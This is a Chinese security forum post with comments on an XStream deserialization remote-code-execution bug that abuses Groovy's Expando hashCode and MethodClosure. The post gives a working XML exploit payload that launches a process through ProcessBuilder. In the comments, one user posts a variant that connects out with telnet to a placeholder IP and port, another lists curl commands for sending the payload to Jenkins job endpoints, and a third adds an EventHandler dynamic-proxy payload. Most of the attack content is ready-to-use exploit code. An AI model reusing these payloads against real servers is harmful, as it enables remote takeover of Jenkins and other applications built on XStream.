Java又一个反序列化漏洞——XStream漏洞

XStream是一个著名的反序列化的库,用途广泛,原文中作者以Jenkins为例。实际上XStream可以用在JIRA, Confluence, Bamboo,甚至是Spring和Struts中。
作者发现,在groovy.util.Expando重载hashCode方法的时候出了问题:
public int hashCode() {
  Object method = getProperties().get("hashCode");
  if (method != null && method instanceof Closure) {
    // invoke overridden hashCode closure method
    Closure closure = (Closure) method;
    closure.setDelegate(this);
    Integer ret = (Integer) closure.call();
    return ret.intValue();
  } else {
    return super.hashCode();
  }
}

当Expando中存在闭包对象时,Expando会使用该方法计算并返回hashCode,然而这个闭包对象是可控的,从而可以执行我们的代码。
于是作者给出了EXP,使用XStream解析下面的片段时,会弹出计算器:
<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <!--这里是告诉Expando计算hashCode的时候使用我们的闭包方法--!>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <!--执行打开计算器的操作(当然也可以是别的!)--!>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>open</string>
                <string>/Applications/Calculator.app</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </owner>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>

给出的执行链:
MapConverter#populateMap() 调用了 HashMap#put()
HashMap#put() 调用了 Expando#hashCode()
Expando#hashCode() 调用了 MethodClosure#call()
MethodClosure#call() 调用了 MethodClosure#doCall()
MethodClosure#doCall() 调用了 InvokerHelper#invokeMethod()
InvokerHelper#invokeMethod() 调用了 ProcessBuilder#start()
EXP的意义是我们在MethodClosure#call()中执行动作,传递进去污染数据,执行任意代码。
详细见:
https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream?platform=hootsuite

感谢(0)
分享到: 0
  1. 1# hkAssassin | 2016-02-26 11:28

    66666

  2. 2# _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2016-02-26 11:29

    先mark。

  3. 3# 坏男孩-A_A | 2016-02-26 11:35

    mark

  4. 4# 坏男孩-A_A | 2016-02-26 11:37

    代码审计起来就得爽了

  5. 5# 我是壮丁 (专业打酱油) | 2016-02-26 11:42

    周末有事干了。。。

  6. 6# Grani | 2016-02-26 11:47

    mark

  7. 7# 爱上平顶山 (IT民工 职业搬砖 挖坑 丝一枚 神马都不会~) | 2016-02-26 11:48

    ...........

  8. 8# Kuuki | 2016-02-26 12:20

    <map>
      <entry>
        <groovy.util.Expando>
          <expandoProperties>
            <entry>
              <string>hashCode</string>
              <org.codehaus.groovy.runtime.MethodClosure>
                <delegate class="groovy.util.Expando" reference="../../../.."/>
                <owner class="java.lang.ProcessBuilder">
                  <command>
                    <string>telnet</string>
                    <string>***IP***</string>
           <string>***PORT***</string>
                  </command>
                  <redirectErrorStream>false</redirectErrorStream>
                </owner>
                <resolveStrategy>0</resolveStrategy>
                <directive>0</directive>
                <parameterTypes/>
                <maximumNumberOfParameters>0</maximumNumberOfParameters>
                <method>start</method>
              </org.codehaus.groovy.runtime.MethodClosure>
            </entry>
          </expandoProperties>
        </groovy.util.Expando>
        <int>1</int>
      </entry>
    </map>
    hehe.png

  9. 9# 隐形人真忙 (关注安全研发与漏洞) | 2016-02-26 12:50

    @我是壮丁 你周末不是一直挺忙吗:D

  10. 10# Bhunter | 2016-02-26 12:53

    看不懂的忧伤

  11. 11# LoveSnow (我要努力,争取开发自己的神器) | 2016-02-26 13:00

    先mark

  12. 12# ghy459 (深挖洞,广积shell。) | 2016-02-26 13:27

    @Kuuki 你为何这么屌

  13. 13# tig3r | 2016-02-26 14:22

    1. curl -X POST "http://jenkins/job/test/config.xml" --data-binary xml文件 -H "Content-Type: text/xml"
    2. curl -X POST "http://jenkins/createItem?name=test" --data-binary xml文件 -H "Content-Type: text/xml"
    3. ...一堆接口

  14. 14# PiaCa (ﻬ10wb 求把 PiaCa 改成 piaca) | 2016-02-26 14:32

    @tig3r 有不需要权限的接口吗?

  15. 15# tig3r | 2016-02-26 14:41

    @PiaCa 没找到 如果有谁找到了这里分享下哈

  16. 16# 隐形人真忙 (关注安全研发与漏洞) | 2016-02-26 15:29

    @PiaCa @tig3r  那篇博客给出的只是运用在jenkins的一个例子 理论上如果app同时使用XStream和Groovy都会有影响
    研究java web的大神都在闷声发大财吗

  17. 17# Mayter | 2016-02-26 16:21

    mark

  18. 18# ’‘Nome (<>?:"{}!%^#&*看出啥来了?) | 2016-02-26 16:23

    谢谢

  19. 19# f4ckbaidu (wtf) | 2016-02-26 16:57

    13年就有了的= =
    http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/

  20. 20# 打电话叫人 (没事,打电话叫人) | 2016-02-27 07:45

    m

  21. 21# Fire ant | 2016-02-27 09:38

    其实我一直想问遇到windows怎么反弹shell。。。。。

  22. 22# 七叶 | 2016-02-27 13:29

    xstream底层锅,上层触发方式有两种
    1. sort-map: proxy代理拦截执行
    String payload =
    "<sorted-set>" +
        "<string>littlehann</string>" +
        "<dynamic-proxy>" +
        "<interface>java.lang.Comparable</interface>" +
        "<handler class=\"java.beans.EventHandler\">" +
            " <target class=\"java.lang.ProcessBuilder\">" +
            " <command>" +
                " <string>notepad.exe</string>" +
            " </command>" +
            " </target>" +
            " <action>start</action>" +
        "</handler>" +
        "</dynamic-proxy>" +
    "</sorted-set>"

    2. grovy闭包执行重载hashCode
    String payload =
    "<map>" +
    "  <entry>" +
    "    <groovy.util.Expando>" +
    "      <expandoProperties>" +
    "        <entry>" +
    "          <string>hashCode</string>" +
    "          <org.codehaus.groovy.runtime.MethodClosure>" +
    "            <delegate class=\"groovy.util.Expando\" reference=\"../../../..\"/>" +
    "            <owner class=\"java.lang.ProcessBuilder\">" +
    "              <command>" +
    "                <string>notepad.exe</string>" +
    "              </command>" +
    "              <redirectErrorStream>false</redirectErrorStream>" +
    "            </owner>" +
    "            <resolveStrategy>0</resolveStrategy>" +
    "            <directive>0</directive>" +
    "            <parameterTypes/>" +
    "            <maximumNumberOfParameters>0</maximumNumberOfParameters>" +
    "            <method>start</method>" +
    "          </org.codehaus.groovy.runtime.MethodClosure>" +
    "        </entry>" +
    "      </expandoProperties>" +
    "    </groovy.util.Expando>" +
    "    <int>1</int>" +
    "  </entry>" +
    "</map>"

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 编程工作室 设计师:CSDN官方博客 返回首页